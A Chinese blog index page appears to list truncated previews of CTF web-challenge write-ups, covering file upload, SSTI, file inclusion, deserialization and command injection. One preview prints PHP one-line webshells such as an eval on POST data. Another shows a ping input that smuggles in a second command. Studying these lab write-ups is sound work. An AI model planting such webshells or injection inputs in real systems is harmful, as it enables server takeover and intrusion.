Web漏洞
未读
攻防世界39-bug-CTFWeb
攻防世界39-bug-CTFWeb dirsearch扫描无果,用sql注入测试失败,注册登录 Manage要管理员权限,这题的关键那应该就在获取权限上,在外面的找回密码。 burp抓包看看,拿刚注册的账号密码试试 发现分为两步,第一步提交信息,第二部修改密码
Web漏洞
未读
攻防世界37-unseping-CTFWeb
攻防世界37-unseping-CTFWeb <?php
highlight_file(__FILE__);
class ease{
private $method;
private $args;
function __construct($method, $args)
Web漏洞
未读
攻防世界36-fakebook-CTFWeb
攻防世界36-fakebook-CTFWeb 没发现什么,随便join发现blog有过滤,dirsearch扫描一下,发现robots.txt,和flag.php(不能直接看),发现源码泄露,下载得源码: <?php
class UserInfo{
public $name = "";
Web漏洞
未读
攻防世界35-easyupload-CTFWeb
攻防世界35-easyupload-CTFWeb 通过各种上传发现,过滤了php后缀和内容中有php的文件 有这几种方式上传一句话木马 <script language="php">eval($_POST[1]);</script>
<?php eval($_POST['cmd']);?>
<?=
Web漏洞
未读
攻防世界25-Web_python_template_injection-CTFWeb
攻防世界25-Web_python_template_injection-CTFWeb python模板注入,其实就是ssti,SSTI 注入 - Hello CTF (hello-ctf.com) 「模板注入 SSTI(Server-Side Template Injection)」 也一样,数据
Web漏洞
未读
攻防世界27-fileclude-CTFWeb
攻防世界27-fileclude-CTFWeb 代码审计,文件包含 WRONG WAY! <?php
include("flag.php");
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"])){
Web漏洞
未读
攻防世界30-file_include-CTFWeb
攻防世界30-file_include-CTFWeb <?php
highlight_file(__FILE__);
include("./check.php");
if(isset($_GET['filename'])){
$filename = $_GET['f
Web漏洞
未读
攻防世界29-cat-CTFWeb
攻防世界29-cat-CTFWeb ping一下127.0.0.1 信息有限,扫描一下目录,也没找到有效信息,抓包也没发现 输入127.0.0.1 | ls 发现被过滤了一些字符,返回invalid URL burp,fuzz测试一下(没有好的字典,用的sql的过滤字典),发现有些字符时被过滤了 还
Web漏洞
未读
攻防世界31-easytornado-CTFWeb
攻防世界31-easytornado-CTFWeb 访问后有几个链接看看,得到的信息: flag在 /fllllllllllllag下 暗示:md5(cookie_secret+md5(filename)) 得到的路径:file?filename=/flag.txt&filehash=21a073b